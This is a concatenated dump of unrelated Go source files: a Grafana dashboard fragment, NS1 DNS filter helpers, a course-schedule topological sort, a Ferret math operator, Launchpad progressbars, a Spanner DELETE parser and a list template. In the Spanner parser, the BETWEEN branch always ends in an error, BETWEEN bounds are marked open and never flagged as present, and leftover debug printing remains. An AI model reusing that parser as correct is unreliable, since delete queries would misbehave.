"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"rx_dropped"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
},
{
"alias": "rx error",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "B",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"rx_errors"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
},
{
"alias": "tx drop",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "C",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"tx_dropped"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
},
{
"alias": "tx error",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_net",
"policy": "default",
"refId": "D",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"tx_errors"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": [
{
"key": "com.docker.swarm.service.name",
"operator": "=~",
"value": "/^$service$/"
}
]
}
],
"timeFrom": null,
"timeShift": null,
"title": "$service: rx / tx",
"tooltip": {
"msResolution": false,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "bytes",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
}
],
"repeat": "service",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"showTitle": false,
"title": "Docker"
}
],
"time": {
"from": "now-15m",
"to": "now"
},
"timepicker": {
"refresh_intervals": [
"5s",
"10s",
"30s",
"1m",
"5m",
"15m",
"30m",
"1h",
"2h",
"1d"
],
"time_options": [
"5m",
"15m",
"1h",
"6h",
"12h",
"24h",
"2d",
"7d",
"30d"
]
},
"templating": {
"list": []
},
"annotations": {
"list": []
},
"refresh": "5s",
"schemaVersion": 12,
"version": 68,
"links": [
{
"asDropdown": false,
"icon": "external link",
"tags": [],
"type": "dashboards"
}
]
}
` | cmd/dashboard_json_v3.go | 0.568536 | 0.415729 | dashboard_json_v3.go | starcoder |
package filter
// Filter wraps the values of a Record's "filters" attribute
type Filter struct {
	// Type identifies the filter algorithm (e.g. "shuffle", "priority").
	Type string `json:"filter"`
	// Disabled, when true, marks the filter as skipped in the chain.
	Disabled bool `json:"disabled,omitempty"`
	// Config holds the filter-specific settings.
	Config Config `json:"config"`
}
// Enable a filter (clears the Disabled flag).
func (f *Filter) Enable() {
	f.Disabled = false
}

// Disable a filter (sets the Disabled flag).
func (f *Filter) Disable() {
	f.Disabled = true
}

// Config is a flat mapping where values are simple (no slices/maps).
type Config map[string]interface{}
// NewSelFirstN returns a filter that eliminates all but the
// first n answers from the list.
func NewSelFirstN(n int) *Filter {
	f := &Filter{Type: "select_first_n"}
	f.Config = Config{"N": n}
	return f
}
// NewShuffle returns a filter that randomly sorts the answers.
func NewShuffle() *Filter {
	f := &Filter{
		Type:   "shuffle",
		Config: Config{},
	}
	return f
}
// GEOGRAPHICAL FILTERS
// NewSelFirstRegion returns a filter that keeps only the answers
// that are in the same region as the first answer.
func NewSelFirstRegion() *Filter {
	// BUG FIX: the type previously read "select_first_n", which is a
	// different filter entirely; the API name for this behaviour is
	// "select_first_region".
	return &Filter{
		Type:   "select_first_region",
		Config: Config{},
	}
}
// NewStickyRegion first sorts regions uniquely depending on the IP
// address of the requester, and then groups all answers together by
// region. The same requester always gets the same ordering of regions,
// but answers within each region may be in any order. byNetwork indicates
// whether to apply the 'stickyness' by subnet (not individual IP).
func NewStickyRegion(byNetwork bool) *Filter {
	cfg := Config{"sticky_by_network": byNetwork}
	return &Filter{Type: "sticky_region", Config: cfg}
}
// NewGeofenceCountry returns a filter that fences using "country",
// "us_state", and "ca_province" metadata fields in answers. Only
// answers in the same country/state/province as the user (or
// answers with no specified location) are returned. rmNoLoc determines
// whether to remove answers without location on any match.
func NewGeofenceCountry(rmNoLoc bool) *Filter {
	cfg := Config{"remove_no_location": rmNoLoc}
	return &Filter{Type: "geofence_country", Config: cfg}
}
// NewGeofenceRegional returns a filter that restricts to answers in
// same geographical region as requester. rmNoGeo determines whether
// to remove answers without georegion on any match.
func NewGeofenceRegional(rmNoGeo bool) *Filter {
	cfg := Config{"remove_no_georegion": rmNoGeo}
	return &Filter{Type: "geofence_regional", Config: cfg}
}
// NewGeotargetCountry returns a filter that sorts answers by distance
// to requester by country, US state, and/or Canadian province.
func NewGeotargetCountry() *Filter {
	// BUG FIX: the type previously read "geofence_country", which is the
	// fencing filter; the sorting filter's API name is "geotarget_country".
	return &Filter{Type: "geotarget_country", Config: Config{}}
}
// NewGeotargetLatLong returns a filter that sorts answers by distance
// to user using lat/long.
func NewGeotargetLatLong() *Filter {
	f := &Filter{
		Type:   "geotarget_latlong",
		Config: Config{},
	}
	return f
}
// NewGeotargetRegional returns a filter that sorts answers by distance
// to user by geographical region.
func NewGeotargetRegional() *Filter {
	f := &Filter{
		Type:   "geotarget_regional",
		Config: Config{},
	}
	return f
}
// NETWORK FILTERS
// NewSticky returns a filter that sorts answers uniquely depending
// on the IP address of the requester. The same requester always
// gets the same ordering of answers. byNetwork indicates whether
// to apply the 'stickyness' by subnet (not individual IP).
func NewSticky(byNetwork bool) *Filter {
	cfg := Config{"sticky_by_network": byNetwork}
	return &Filter{Type: "sticky", Config: cfg}
}
// NewWeightedSticky returns a filter that shuffles answers randomly
// per-requester based on weight. byNetwork indicates whether to
// apply the 'stickyness' by subnet (not individual IP).
func NewWeightedSticky(byNetwork bool) *Filter {
	cfg := Config{"sticky_by_network": byNetwork}
	return &Filter{Type: "weighted_sticky", Config: cfg}
}
// NewIPv4PrefixShuffle returns a filter that randomly selects
// IPv4 addresses from prefix list. This filter can only be used with
// A records. n is the number of IPs to randomly select per answer.
func NewIPv4PrefixShuffle(n int) *Filter {
	cfg := Config{"N": n}
	return &Filter{Type: "ipv4_prefix_shuffle", Config: cfg}
}
// NewNetfenceASN returns a filter that restricts to answers where
// the ASN of requester IP matches ASN list. rmNoASN determines
// whether to remove answers without asn list on any match.
func NewNetfenceASN(rmNoASN bool) *Filter {
	cfg := Config{"remove_no_asn": rmNoASN}
	return &Filter{Type: "netfence_asn", Config: cfg}
}
// NewNetfencePrefix returns a filter that restricts to answers where
// requester IP matches prefix list. rmNoIPPrefix determines
// whether to remove answers without ip prefixes on any match.
func NewNetfencePrefix(rmNoIPPrefix bool) *Filter {
	cfg := Config{"remove_no_ip_prefixes": rmNoIPPrefix}
	return &Filter{Type: "netfence_prefix", Config: cfg}
}
// STATUS FILTERS
// NewUp returns a filter that eliminates all answers where
// the 'up' metadata field is not true.
func NewUp() *Filter {
	f := &Filter{
		Type:   "up",
		Config: Config{},
	}
	return f
}
// NewPriority returns a filter that fails over according to
// prioritized answer tiers.
func NewPriority() *Filter {
	f := &Filter{
		Type:   "priority",
		Config: Config{},
	}
	return f
}
// NewShedLoad returns a filter that "sheds" traffic to answers
// based on load, using one of several load metrics. You must set
// values for low_watermark, high_watermark, and the configured
// load metric, for each answer you intend to subject to load
// shedding.
func NewShedLoad(metric string) *Filter {
	cfg := Config{"metric": metric}
	return &Filter{Type: "shed_load", Config: cfg}
}
// TRAFFIC FILTERS
// NewWeightedShuffle returns a filter that shuffles answers
// randomly based on their weight.
func NewWeightedShuffle() *Filter {
return &Filter{Type: "weighted_shuffle", Config: Config{}}
} | vendor/gopkg.in/ns1/ns1-go.v2/rest/model/filter/filter.go | 0.873902 | 0.484807 | filter.go | starcoder |
package main
import (
"container/list"
)
/*
210 course schedule II
There are a total of n courses you have to take labelled from 0 to n - 1.
Some courses may have prerequisites, for example, if prerequisites[i] = [ai, bi] this means you must take the course bi before the course ai.
Given the total number of courses numCourses and a list of the prerequisite pairs, return the ordering of courses you should take to finish all courses.
If there are many valid answers, return any of them. If it is impossible to finish all courses, return an empty array.
topological sorting, find nodes where in-degree == 0
Example 1:
Input: numCourses = 2, prerequisites = [[1,0]]
Output: [0,1]
Explanation: There are a total of 2 courses to take. To take course 1 you should have finished course 0. So the correct course order is [0,1].
Example 2:
Input: numCourses = 4, prerequisites = [[1,0],[2,0],[3,1],[3,2]]
Output: [0,2,1,3]
Explanation: There are a total of 4 courses to take. To take course 3 you should have finished both courses 1 and 2. Both courses 1 and 2 should be taken after you finished course 0.
So one correct course order is [0,1,2,3]. Another correct ordering is [0,2,1,3].
Example 3:
Input: numCourses = 1, prerequisites = []
Output: [0]
*/
// findOrderII returns an ordering of the courses 0..numCourses-1 such that
// every course appears after all of its prerequisites (Kahn's algorithm,
// i.e. BFS topological sort). If the prerequisite graph contains a cycle an
// empty slice is returned. prerequisites[i] = [a, b] means course b must be
// taken before course a; pairs referencing course ids outside the valid
// range are ignored, and a pair of the wrong length panics (invalid input).
func findOrderII(numCourses int, prerequisites [][]int) []int {
	if numCourses == 0 {
		return []int{}
	}
	// Slice-based in-degree and adjacency tables: course ids are already
	// dense 0..n-1, and iterating slices is deterministic — the previous
	// map-based version seeded the queue in randomized map-iteration order,
	// so repeated calls could return different (albeit valid) orderings.
	inDegree := make([]int, numCourses)
	graph := make([][]int, numCourses)
	for _, p := range prerequisites {
		if len(p) != 2 {
			panic("invalid input")
		}
		course, prereq := p[0], p[1]
		if course < 0 || course >= numCourses || prereq < 0 || prereq >= numCourses {
			continue // references to unknown courses are ignored
		}
		graph[prereq] = append(graph[prereq], course)
		inDegree[course]++
	}
	// Seed the queue with every course that has no prerequisites.
	queue := list.New()
	for i := 0; i < numCourses; i++ {
		if inDegree[i] == 0 {
			queue.PushBack(i)
		}
	}
	order := make([]int, 0, numCourses)
	for queue.Len() > 0 {
		front := queue.Front()
		queue.Remove(front)
		node := front.Value.(int)
		order = append(order, node)
		for _, next := range graph[node] {
			inDegree[next]--
			if inDegree[next] == 0 {
				queue.PushBack(next)
			}
		}
	}
	// Scheduling fewer than numCourses means a cycle blocked some courses.
	if len(order) != numCourses {
		return []int{}
	}
	return order
}
package operators
import (
"context"
"github.com/MontFerret/ferret/pkg/runtime/core"
"github.com/MontFerret/ferret/pkg/runtime/values"
)
type (
	// MathOperatorType is the textual symbol of an arithmetic operator.
	MathOperatorType string

	// MathOperator evaluates an arithmetic expression over one or two
	// operand expressions. For unary operators (++/--) only the left
	// operand is evaluated.
	MathOperator struct {
		*baseOperator
		opType MathOperatorType
		fn OperatorFunc
		leftOnly bool
	}
)

// Symbols of all supported arithmetic operators.
const (
	MathOperatorTypeAdd MathOperatorType = "+"
	MathOperatorTypeSubtract MathOperatorType = "-"
	MathOperatorTypeMultiply MathOperatorType = "*"
	MathOperatorTypeDivide MathOperatorType = "/"
	MathOperatorTypeModulus MathOperatorType = "%"
	MathOperatorTypeIncrement MathOperatorType = "++"
	MathOperatorTypeDecrement MathOperatorType = "--"
)

// mathOperators maps each operator symbol to its implementation.
var mathOperators = map[MathOperatorType]OperatorFunc{
	MathOperatorTypeAdd:       Add,
	MathOperatorTypeSubtract:  Subtract,
	MathOperatorTypeMultiply:  Multiply,
	MathOperatorTypeDivide:    Divide,
	MathOperatorTypeModulus:   Modulus,
	MathOperatorTypeIncrement: Increment,
	MathOperatorTypeDecrement: Decrement,
}
// NewMathOperator constructs a MathOperator for the given operator symbol.
// left and right are the operand expressions; unary operators (++/--) only
// evaluate the left operand. It returns core.ErrInvalidArgument when the
// operator symbol is unknown.
func NewMathOperator(
	src core.SourceMap,
	left core.Expression,
	right core.Expression,
	operator MathOperatorType,
) (*MathOperator, error) {
	fn, exists := mathOperators[operator]
	if !exists {
		return nil, core.Error(core.ErrInvalidArgument, "operator type")
	}
	// Compare against the named constants instead of raw "++"/"--" string
	// literals so this check cannot drift from the declared operator set.
	leftOnly := operator == MathOperatorTypeIncrement ||
		operator == MathOperatorTypeDecrement
	return &MathOperator{
		&baseOperator{src, left, right},
		operator,
		fn,
		leftOnly,
	}, nil
}
// Type returns the operator symbol this MathOperator was built with.
func (operator *MathOperator) Type() MathOperatorType {
	return operator.opType
}
// Exec evaluates the operand expressions against the scope and applies the
// operator. For unary operators the right operand expression is never
// executed; values.None is passed in its place.
func (operator *MathOperator) Exec(ctx context.Context, scope *core.Scope) (core.Value, error) {
	left, err := operator.left.Exec(ctx, scope)
	if err != nil {
		return nil, err
	}
	var right core.Value = values.None
	if !operator.leftOnly {
		right, err = operator.right.Exec(ctx, scope)
		if err != nil {
			return nil, err
		}
	}
	return operator.Eval(ctx, left, right)
}
func (operator *MathOperator) Eval(_ context.Context, left, right core.Value) (core.Value, error) {
if operator.leftOnly {
return operator.fn(left, values.None), nil
}
return operator.fn(left, right), nil
} | pkg/runtime/expressions/operators/math.go | 0.612773 | 0.430806 | math.go | starcoder |
package gfx
import (
"errors"
"github.com/rainu/launchpad-super-trigger/pad"
)
// HorizontalProgressbar draws a horizontal progressbar spanning the full pad
// width in row y. percent is clamped to [0, 100] by the underlying helper;
// dir selects which side the bar grows from; fill/empty color the completed
// and remaining cells.
func (e Renderer) HorizontalProgressbar(y, percent int, dir Direction, fill, empty pad.Color) error {
	return e.horizontalQuadrantProgressbar(y, minX, padLength, percent, dir, fill, empty)
}
// HorizontalQuadrantProgressbar draws a horizontal progressbar restricted to
// one quadrant of the pad. y is the row offset within the quadrant, percent
// is clamped to [0, 100], and dir selects the growth direction. An unknown
// quadrant yields an error.
func (e Renderer) HorizontalQuadrantProgressbar(q Quadrant, y, percent int, dir Direction, fill, empty pad.Color) error {
	var row, xFrom, xUntil int
	switch q {
	case FirstQuadrant:
		row, xFrom, xUntil = y, 4, padLength
	case SecondQuadrant:
		row, xFrom, xUntil = y, minX, 4
	case ThirdQuadrant:
		row, xFrom, xUntil = y+4, minX, 4
	case ForthQuadrant:
		row, xFrom, xUntil = y+4, 4, padLength
	default:
		return errors.New("invalid quadrant")
	}
	return e.horizontalQuadrantProgressbar(row, xFrom, xUntil, percent, dir, fill, empty)
}
// horizontalQuadrantProgressbar renders a horizontal bar in row y covering
// columns [xFrom, xUntil). percent is clamped to [0, 100]. For AscDirection
// the bar fills starting at xFrom; otherwise it fills starting at xUntil-1
// and moves toward xFrom.
func (e Renderer) horizontalQuadrantProgressbar(y, xFrom, xUntil, percent int, dir Direction, fill, empty pad.Color) error {
	if percent < 0 {
		percent = 0
	} else if percent > 100 {
		percent = 100
	}
	width := xUntil - xFrom
	filled := (width * percent) / 100
	pixel := make([]FramePixel, 0, width)
	for i := 0; i < width; i++ {
		x := xFrom + i
		if dir != AscDirection {
			x = xUntil - 1 - i
		}
		color := empty
		if i < filled {
			color = fill
		}
		pixel = append(pixel, FramePixel{X: x, Y: y, Color: color})
	}
	return e.Pattern(pixel...)
}
// VerticalProgressbar draws a vertical progressbar spanning the full pad
// height in column x. percent is clamped to [0, 100] by the underlying
// helper; dir selects which end the bar grows from; fill/empty color the
// completed and remaining cells.
func (e Renderer) VerticalProgressbar(x, percent int, dir Direction, fill, empty pad.Color) error {
	return e.verticalQuadrantProgressbar(x, minY, padHeight, percent, dir, fill, empty)
}
// VerticalQuadrantProgressbar draws a vertical progressbar restricted to one
// quadrant of the pad. x is the column offset within the quadrant, percent
// is clamped to [0, 100], and dir selects the growth direction. An unknown
// quadrant yields an error.
func (e Renderer) VerticalQuadrantProgressbar(q Quadrant, x, percent int, dir Direction, fill, empty pad.Color) error {
	var col, yFrom, yUntil int
	switch q {
	case FirstQuadrant:
		col, yFrom, yUntil = x+4, minY, 4
	case SecondQuadrant:
		col, yFrom, yUntil = x, minY, 4
	case ThirdQuadrant:
		col, yFrom, yUntil = x, 4, padHeight
	case ForthQuadrant:
		col, yFrom, yUntil = x+4, 4, padHeight
	default:
		return errors.New("invalid quadrant")
	}
	return e.verticalQuadrantProgressbar(col, yFrom, yUntil, percent, dir, fill, empty)
}
func (e Renderer) verticalQuadrantProgressbar(x, yFrom, yUntil, percent int, dir Direction, fill, empty pad.Color) error {
if percent < 0 {
percent = 0
} else if percent > 100 {
percent = 100
}
length := yUntil - yFrom
p := (length * percent) / 100
pixel := make([]FramePixel, 0, length)
if dir == AscDirection {
for y := yUntil - 1; y >= yFrom; y-- {
pixel = append(pixel, FramePixel{X: x, Y: y, Color: empty})
}
} else {
for y := yFrom; y < yUntil; y++ {
pixel = append(pixel, FramePixel{X: x, Y: y, Color: empty})
}
}
for i := 0; i < p && i < len(pixel); i++ {
pixel[i].Color = fill
}
return e.Pattern(pixel...)
} | gfx/progressbar.go | 0.647575 | 0.443902 | progressbar.go | starcoder |
package sqlspanner
import (
"database/sql/driver"
"fmt"
"cloud.google.com/go/spanner"
"github.com/xwb1989/sqlparser"
)
// because spanner has multiple primary keys support, EVERY field
// found in the query is assumed to be a primary key. It will build the spanner.Key with the fields in the
// query in the order they are discovered. For Example if i have two queries:
// q1 = "DELETE FROM test_table WHERE id = 1 AND simple_string="test_string"
// q2 = "DELETE FROM test_table WHERE simple_string="test_string" AND id = 1
// q1 would produce key: { 1, "test_string" }
// q2 would produce key: { "test_string", 2 }
// Try to construct your queries with ANDs instead of ORs. Because different fields are
// interpreted as primary keys, it gets too difficult to parse what is meant by queries like:
// q1 = "DELETE FROM test_table WHERE (id < 1 OR id >= 10) AND simple_string = "test_string"
// it might be possible in the future to parse the meaning of statements like this, but for now it was
// easier to just drop support of statements for OR expressions
// Other Rules:
// - NOT expressions are not supported, It is not possible to tell a spanner key what "not" means.
// - currently only one key range, per primary key is permitted. Just use two queries. ex.
// not permitted: DELETE FROM test_table WHERE id > 1 AND id < 10 AND id > 20 AND id < 100
// - Does not support cross table queries
func extractSpannerKeyFromDelete(del *sqlparser.Delete) (*MergableKeyRange, error) {
where := del.Where
if where == nil {
return nil, fmt.Errorf("Must include a where clause that contain primary keys in delete statement")
}
myArgs := &Args{}
fmt.Printf("where type: %+v\n", where.Type)
aKeySet := &AwareKeySet{
Args: myArgs,
Keys: make(map[string]*Key),
KeyOrder: make([]string, 0),
}
err := aKeySet.walkBoolExpr(where.Expr)
if err != nil {
return nil, err
}
return aKeySet.packKeySet()
}
// Key accumulates the bound information parsed for one primary-key column
// of a WHERE clause.
type Key struct {
	// Name is the column name as written in the query.
	Name string
	// LowerValue/UpperValue hold the parsed bound values, if any.
	LowerValue interface{}
	UpperValue interface{}
	// LowerOpen/UpperOpen record whether the bound excludes its endpoint
	// (e.g. ">" vs ">=").
	LowerOpen bool
	UpperOpen bool
	// HaveLower/HaveUpper record whether each bound was seen at all.
	HaveLower bool
	HaveUpper bool
}
// AwareKeySet collects Keys in the order they are first seen while walking
// a WHERE clause; first-seen order defines key priority.
type AwareKeySet struct {
	// Keys maps a column name to its accumulated bounds.
	Keys map[string]*Key
	// KeyOrder preserves the order in which columns were first encountered.
	KeyOrder []string
	// Args tracks the statement's placeholder arguments.
	Args *Args
}
// MergableKeyRange is an intermediate form of a spanner.KeyRange: Start and
// End collect the per-column bound values, while the openness flags
// determine the eventual KeyRangeKind.
type MergableKeyRange struct {
	Start *partialArgSlice
	End   *partialArgSlice
	// LowerOpen/UpperOpen: whether each end excludes its endpoint.
	LowerOpen bool
	UpperOpen bool
	// HaveLower/HaveUpper: whether any bound was recorded for that end.
	HaveLower bool
	HaveUpper bool
}
// all lower bounds are turned into a key together.
// all upper bounds are turned into a key together.
// it is expected that all fields in a query belong together
func (a *AwareKeySet) packKeySet() (*MergableKeyRange, error) {
	// Reject "holes" in the key ranges: a key may only constrain a bound if
	// every higher-priority key constrains that same bound.
	for i := len(a.KeyOrder) - 1; i > 0; i-- { // dont check before the first elem
		me := a.Keys[a.KeyOrder[i]]
		keyBeforeMe := a.Keys[a.KeyOrder[i-1]]
		if me.HaveLower && !keyBeforeMe.HaveLower {
			return nil, fmt.Errorf("cannot have a lower bound on a key range without defining all higher priority lower bounds")
		}
		if me.HaveUpper && !keyBeforeMe.HaveUpper {
			return nil, fmt.Errorf("cannot have a upper bound on a key range without defining all higher priority upper bounds")
		}
	}
	// Fold every key, in priority order, into a single mergable range.
	// Debug fmt.Printf calls removed: a database driver must not write to
	// stdout during normal operation.
	var merged *MergableKeyRange
	for _, name := range a.KeyOrder {
		key := a.Keys[name]
		if merged == nil {
			merged = &MergableKeyRange{Start: newPartialArgSlice(), End: newPartialArgSlice()}
			merged.fromKey(key)
			continue
		}
		if err := merged.mergeKey(key); err != nil {
			return nil, err
		}
	}
	return merged, nil
}
// fromKey seeds an empty MergableKeyRange from the first (highest priority)
// key: the openness and presence flags are copied wholesale, and the key's
// bound values become the first components of the start and end keys.
// A nil key is a no-op.
func (kr *MergableKeyRange) fromKey(key *Key) {
	if key == nil {
		return
	}
	kr.LowerOpen, kr.UpperOpen = key.LowerOpen, key.UpperOpen
	kr.HaveLower, kr.HaveUpper = key.HaveLower, key.HaveUpper
	kr.Start.AddArgs(key.LowerValue)
	kr.End.AddArgs(key.UpperValue)
}
// ToKeyRange materializes the accumulated bounds into a spanner.KeyRange,
// filling any placeholder positions from the supplied driver arguments.
// The range Kind is derived from the two openness flags.
func (k *MergableKeyRange) ToKeyRange(args []driver.Value) (*spanner.KeyRange, error) {
	var kind spanner.KeyRangeKind
	switch {
	case k.LowerOpen && k.UpperOpen:
		kind = spanner.OpenOpen
	case k.LowerOpen:
		kind = spanner.OpenClosed
	case k.UpperOpen:
		kind = spanner.ClosedOpen
	default:
		kind = spanner.ClosedClosed
	}
	start, err := k.Start.GetFilledArgs(args)
	if err != nil {
		return nil, err
	}
	end, err := k.End.GetFilledArgs(args)
	if err != nil {
		return nil, err
	}
	return &spanner.KeyRange{Start: start, End: end, Kind: kind}, nil
}
// mergeKey appends the bounds of the next (lower priority) key column onto
// the accumulated range. The openness of the new bounds must agree with the
// range built so far: a spanner.KeyRange carries a single Kind for the whole
// range, so mixing open and closed bounds cannot be represented.
func (k1 *MergableKeyRange) mergeKey(k2 *Key) error {
	if k2.HaveLower {
		if k1.LowerOpen != k2.LowerOpen {
			return fmt.Errorf("kinds in ranges must all match")
		}
		k1.Start.AddArgs(k2.LowerValue)
	}
	if k2.HaveUpper {
		if k1.UpperOpen != k2.UpperOpen {
			return fmt.Errorf("kinds in ranges must all match")
		}
		k1.End.AddArgs(k2.UpperValue)
	}
	return nil
}
// addKeyFromValExpr resolves a column reference to its Key entry, creating
// the entry (and recording its priority order) on first sight. Only bare,
// unqualified column names are accepted.
func (a *AwareKeySet) addKeyFromValExpr(valExpr sqlparser.ValExpr) (*Key, error) {
	col, ok := valExpr.(*sqlparser.ColName)
	if !ok {
		return nil, fmt.Errorf("not a valid column name")
	}
	if len(col.Qualifier) != 0 {
		return nil, fmt.Errorf("qualifiers not allowed")
	}
	keyName := string(col.Name[:])
	if existing := a.Keys[keyName]; existing != nil {
		return existing, nil
	}
	key := &Key{Name: keyName}
	a.Keys[keyName] = key
	a.KeyOrder = append(a.KeyOrder, keyName)
	return key, nil
}
func (a *AwareKeySet) walkBoolExpr(boolExpr sqlparser.BoolExpr) error {
switch expr := boolExpr.(type) {
case *sqlparser.AndExpr:
fmt.Printf("AndExpr %#v\n", expr)
err := a.walkBoolExpr(expr.Left)
if err != nil {
return err
}
err = a.walkBoolExpr(expr.Right)
if err != nil {
return err
}
return nil
case *sqlparser.OrExpr:
fmt.Printf("OrExpr %#v\n", expr)
return fmt.Errorf("Or Expressions are not currently supported")
case *sqlparser.ParenBoolExpr:
fmt.Printf("ParenBoolExpr %#v\n", expr)
case *sqlparser.ComparisonExpr:
fmt.Printf("ComparisonExpr %#v\n", expr)
myKey, err := a.addKeyFromValExpr(expr.Left)
if err != nil {
return err
}
val, err := a.Args.ParseValExpr(expr.Right)
if err != nil {
return err
}
fmt.Printf("OPERTATOR %#v\n", expr.Operator)
switch expr.Operator {
case "=":
myKey.LowerValue = val
myKey.UpperValue = val
myKey.LowerOpen = false
myKey.UpperOpen = false
myKey.HaveUpper = true
myKey.HaveLower = true
return nil
case ">":
myKey.LowerValue = val
myKey.LowerOpen = true
myKey.HaveLower = true
return nil
case "<":
myKey.UpperValue = val
myKey.UpperOpen = true
myKey.HaveUpper = true
return nil
case ">=":
myKey.LowerValue = val
myKey.LowerOpen = false
myKey.HaveLower = true
return nil
case "<=":
myKey.UpperValue = val
myKey.UpperOpen = false
myKey.HaveUpper = true
return nil
case "!=":
return fmt.Errorf("!= comparisons are not supported")
case "not in", "in":
return fmt.Errorf("in, and not in comparisons are not supported")
default:
return fmt.Errorf("%#v is not a supported operator", expr.Operator)
}
case *sqlparser.RangeCond:
fmt.Printf("RangeCond %#v\n", expr)
myKey, err := a.addKeyFromValExpr(expr.Left)
if err != nil {
return err
}
from, err := a.Args.ParseValExpr(expr.From)
if err != nil {
return err
}
to, err := a.Args.ParseValExpr(expr.To)
if err != nil {
return err
}
switch expr.Operator {
case "between":
myKey.LowerValue = from
myKey.LowerOpen = true
myKey.UpperValue = to
myKey.UpperOpen = true
case "not between":
return fmt.Errorf("not between operator is not supported")
}
case *sqlparser.ExistsExpr:
fmt.Printf("ExistsExpr %#v\n", expr)
return fmt.Errorf("Exists Expressions are not supported")
default:
fmt.Printf("HITTING DEFAULT %#v\n", boolExpr)
}
return fmt.Errorf("not a boolexpr %#v\n", boolExpr)
} | parse_sql_delete.go | 0.563378 | 0.418459 | parse_sql_delete.go | starcoder |
package list
// predicatedFunctions is the text/template source for the predicate-based
// helper methods (Filter, Partition, CountBy, MinBy, MaxBy, DistinctBy and
// the IndexWhere family) generated for each concrete list type.
// Template fields: .TName is the generated type-name prefix, .PName the
// element type.
const predicatedFunctions = `
//-------------------------------------------------------------------------------------------------
// Filter returns a new {{.TName}}List whose elements return true for func.
func (list {{.TName}}List) Filter(fn func({{.PName}}) bool) {{.TName}}Collection {
	result := make({{.TName}}List, 0, len(list)/2)
	for _, v := range list {
		if fn(v) {
			result = append(result, v)
		}
	}
	return result
}
// Partition returns two new {{.TName}}Lists whose elements return true or false for the predicate, p.
// The first result consists of all elements that satisfy the predicate and the second result consists of
// all elements that don't. The relative order of the elements in the results is the same as in the
// original list.
func (list {{.TName}}List) Partition(p func({{.PName}}) bool) ({{.TName}}Collection, {{.TName}}Collection) {
	matching := make({{.TName}}List, 0, len(list)/2)
	others := make({{.TName}}List, 0, len(list)/2)
	for _, v := range list {
		if p(v) {
			matching = append(matching, v)
		} else {
			others = append(others, v)
		}
	}
	return matching, others
}
// CountBy gives the number elements of {{.TName}}List that return true for the passed predicate.
func (list {{.TName}}List) CountBy(predicate func({{.PName}}) bool) (result int) {
	for _, v := range list {
		if predicate(v) {
			result++
		}
	}
	return
}
// MinBy returns an element of {{.TName}}List containing the minimum value, when compared to other elements
// using a passed func defining ‘less’. In the case of multiple items being equally minimal, the first such
// element is returned. Panics if there are no elements.
func (list {{.TName}}List) MinBy(less func({{.PName}}, {{.PName}}) bool) (result {{.PName}}) {
	l := len(list)
	if l == 0 {
		panic("Cannot determine the minimum of an empty list.")
	}
	m := 0
	for i := 1; i < l; i++ {
		if less(list[i], list[m]) {
			m = i
		}
	}
	result = list[m]
	return
}
// MaxBy returns an element of {{.TName}}List containing the maximum value, when compared to other elements
// using a passed func defining ‘less’. In the case of multiple items being equally maximal, the first such
// element is returned. Panics if there are no elements.
func (list {{.TName}}List) MaxBy(less func({{.PName}}, {{.PName}}) bool) (result {{.PName}}) {
	l := len(list)
	if l == 0 {
		panic("Cannot determine the maximum of an empty list.")
	}
	m := 0
	for i := 1; i < l; i++ {
		if less(list[m], list[i]) {
			m = i
		}
	}
	result = list[m]
	return
}
// DistinctBy returns a new {{.TName}}List whose elements are unique, where equality is defined by a passed func.
func (list {{.TName}}List) DistinctBy(equal func({{.PName}}, {{.PName}}) bool) (result {{.TName}}List) {
Outer:
	for _, v := range list {
		for _, r := range result {
			if equal(v, r) {
				continue Outer
			}
		}
		result = append(result, v)
	}
	return result
}
// IndexWhere finds the index of the first element satisfying some predicate. If none exists, -1 is returned.
func (list {{.TName}}List) IndexWhere(p func({{.PName}}) bool) int {
	for i, v := range list {
		if p(v) {
			return i
		}
	}
	return -1
}
// IndexWhere2 finds the index of the first element satisfying some predicate at or after some start index.
// If none exists, -1 is returned.
func (list {{.TName}}List) IndexWhere2(p func({{.PName}}) bool, from int) int {
	for i, v := range list {
		if i >= from && p(v) {
			return i
		}
	}
	return -1
}
// LastIndexWhere finds the index of the last element satisfying some predicate.
// If none exists, -1 is returned.
func (list {{.TName}}List) LastIndexWhere(p func({{.PName}}) bool) int {
	for i := len(list) - 1; i >= 0; i-- {
		v := list[i]
		if p(v) {
			return i
		}
	}
	return -1
}
// LastIndexWhere2 finds the index of the last element satisfying some predicate at or after some start index.
// If none exists, -1 is returned.
func (list {{.TName}}List) LastIndexWhere2(p func({{.PName}}) bool, before int) int {
	for i := len(list) - 1; i >= 0; i-- {
		v := list[i]
		if i <= before && p(v) {
			return i
		}
	}
	return -1
}
`
